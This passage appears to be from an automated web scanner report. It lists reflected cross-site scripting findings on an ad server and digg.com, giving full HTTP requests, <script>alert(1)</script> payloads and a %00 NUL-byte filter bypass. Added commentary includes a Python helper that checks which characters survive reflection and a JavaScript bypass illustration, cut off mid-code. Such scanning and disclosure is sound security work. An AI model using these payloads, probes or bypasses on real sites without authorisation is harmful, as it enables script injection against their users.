User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"
The value of the description request parameter is copied into the HTML document as plain text between tags. The payload 4bc0b<a>d55f2fa87d4 was submitted in the description parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'4bc0b<a>d55f2fa87d4&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"
The value of the duration request parameter is copied into the HTML document as plain text between tags. The payload 9d05d<a>d0418fc140c was submitted in the duration parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=1110009d05d<a>d0418fc140c&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"
The value of the eov request parameter is copied into the HTML document as plain text between tags. The payload d55ca<a>e622e206ef9 was submitted in the eov parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5d55ca<a>e622e206ef9 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"
The value of the height request parameter is copied into the HTML document as plain text between tags. The payload 6eead<a>c1e6e1a085e was submitted in the height parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=2406eead<a>c1e6e1a085e&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"
The value of the id request parameter is copied into the HTML document as plain text between tags. The payload ca11a<a>6a67868646c was submitted in the id parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhomca11a<a>6a67868646c&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"
The value of the isTop request parameter is copied into the HTML document as plain text between tags. The payload 8b341<a>9d6b8a426a3 was submitted in the isTop parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true8b341<a>9d6b8a426a3&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"
The value of the keywords request parameter is copied into the HTML document as plain text between tags. The payload f0eed<a>c6c1a053c81 was submitted in the keywords parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptvf0eed<a>c6c1a053c81&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"
1.106. http://control.adap.tv/control [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://control.adap.tv
Path: /control
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8c976<a>f1ee9229782 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5&8c976<a>f1ee9229782=1 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"
The value of the pageUrl request parameter is copied into the HTML document as plain text between tags. The payload d673b<a>3e906cc1dac was submitted in the pageUrl parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxssd673b<a>3e906cc1dac&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"
The value of the sessionId request parameter is copied into the HTML document as plain text between tags. The payload 2f8c4<a>ac8a344f53e was submitted in the sessionId parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf2f8c4<a>ac8a344f53e&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"
The value of the title request parameter is copied into the HTML document as plain text between tags. The payload 9174f<a>7150df027b was submitted in the title parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom9174f<a>7150df027b&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"
The value of the url request parameter is copied into the HTML document as plain text between tags. The payload c9735<a>e3cf58f3e7c was submitted in the url parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72c9735<a>e3cf58f3e7c&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"
The value of the width request parameter is copied into the HTML document as plain text between tags. The payload 2876f<a>6470f90d1d8 was submitted in the width parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=3202876f<a>6470f90d1d8&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"
The value of the zid request parameter is copied into the HTML document as plain text between tags. The payload 8c414<a>3c1703c2f45 was submitted in the zid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent8c414<a>3c1703c2f45&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"
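For every /control parameter above the scanner could confirm only that a bare `<a>` survives, and it hands the rest over to manual testing. The first thing to establish by hand is which metacharacters come back raw, which come back encoded, and which are stripped, because that decides which contexts are worth a payload. The helper below does that classification for a marker-wrapped probe in the scanner's own prefix/payload/suffix style. It is an added example, not part of the report, and the three response bodies in SAMPLES are constructed here (no /control response is shown on the page), so the reachable() hints describe what to try next, not what adap.tv actually does. One caveat the report does not settle: every request carries a Referer of player.swf, so whether a browser would ever render /control as a page, rather than a Flash player consuming it, is something the manual check should confirm before rating these findings.

```python
import html
import re
from urllib.parse import quote

# Metacharacters whose survival decides which XSS contexts are reachable.
PROBE_CHARS = "<>\"'/=();&"

# Forms in which each probe character can come back: raw, entity-encoded
# (named, hex or decimal) or URL-encoded. Longest first so that '&amp;' is
# recognised before a bare '&'.
FORMS = {
    ch: sorted({ch, html.escape(ch, quote=True), "&#%d;" % ord(ch), quote(ch, safe="")},
               key=len, reverse=True)
    for ch in PROBE_CHARS
}


def make_probe(prefix, suffix):
    """Marker-wrapped probe in the style of the scanner's '2afc5<a>336ae514bdb'."""
    return prefix + PROBE_CHARS + suffix


def classify_reflection(prefix, suffix, body):
    """Find the reflection between the two markers and report, per probe
    character, 'raw', the encoded form it came back as, or 'stripped'.
    Returns None when the markers are not both present, in order."""
    m = re.search(re.escape(prefix) + "(.*?)" + re.escape(suffix), body, re.S)
    if not m:
        return None
    echoed, pos, report = m.group(1), 0, {}
    for ch in PROBE_CHARS:
        for form in FORMS[ch]:
            if echoed.startswith(form, pos):
                report[ch] = "raw" if form == ch else form
                pos += len(form)
                break
        else:
            report[ch] = "stripped"
    return report


def reachable(report):
    """Turn the survivors into the manual checks worth doing next."""
    raw = {c for c, v in report.items() if v == "raw"}
    hints = []
    if {"<", ">"} <= raw:
        hints.append("new tag: '<' and '>' survive, so an element carrying an event handler can be injected")
        if not {"(", ")"} <= raw:
            hints.append("no parentheses: a handler body needs a call without '()' or entity-encoded parentheses inside an attribute")
    if '"' in raw or "'" in raw:
        hints.append("attribute breakout: a quote survives, so check reflections inside attribute values too")
    if {"<", "/"} <= raw:
        hints.append("closing tag: '</' survives, so check reflections inside <script> or <textarea>")
    return hints


# Constructed response bodies (no /control response is shown in the report).
SAMPLES = {
    "raw": "<p>categories: category1,category2" + make_probe("2afc5", "336ae514bdb") + "</p>",
    "entity-encoded": "<p>2afc5" + html.escape(PROBE_CHARS, quote=True) + "336ae514bdb</p>",
    "angles-stripped": "<p>2afc5" + PROBE_CHARS.replace("<", "").replace(">", "") + "336ae514bdb</p>",
}


if __name__ == "__main__":
    for name, body in SAMPLES.items():
        report = classify_reflection("2afc5", "336ae514bdb", body)
        print(name, report)
        for hint in reachable(report):
            print("  ->", hint)
```

Send make_probe() with fresh random markers per parameter, feed the response body to classify_reflection(), and compare reports across parameters: on /control all sixteen reflections are presumably handled by the same code path, so one report will usually describe them all, and a parameter whose report differs is the interesting one.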
The value of the sz request parameter is copied into the HTML document as plain text between tags. The payload ac8d0<script>alert(1)</script>93bad1c92ea was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://www.fimserve.com/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR DELa SAMa UNRa OTRa IND UNI PUR NAV INT DEM CNT PRE" Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=ISO-8859-1 Content-Length: 151 Date: Mon, 07 Mar 2011 01:50:03 GMT
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ab6a7"><script>alert(1)</script>c8b7f49b411 was submitted in the REST URL parameter 1. This input was echoed as ab6a7"><script>alert(1)</script>c8b7f49b411 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked. Note that the %00 itself is absent from the echoed value (the payload came back as ab6a7"><script>... rather than %00ab6a7"><script>...), which is consistent with the filter and the output stage handling the string differently: a check built on NUL-terminated string handling sees nothing after the first NUL, while the code that copies the value into the page drops the NUL and emits the rest.
Request
GET /submit%00ab6a7"><script>alert(1)</script>c8b7f49b411 HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
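The following is an added illustration of the bypass class described above, not code from the scan report or from digg.com. It reproduces, hypothetically, two stages that treat the same input differently: a blocklist filter with NUL-terminated string semantics and a template that copies the whole value into an attribute. The handler names, the `<a href>` template and the regular expressions are assumptions; only the shape of the probe is taken from the finding.

```javascript
// Added example (not from the scan report): hypothetical reproduction of the
// %00 bypass class. Nothing here is digg.com's actual code.

// Stage 1: the flawed filter. Mimics a check built on NUL-terminated string
// handling: everything after the first \0 is invisible to it.
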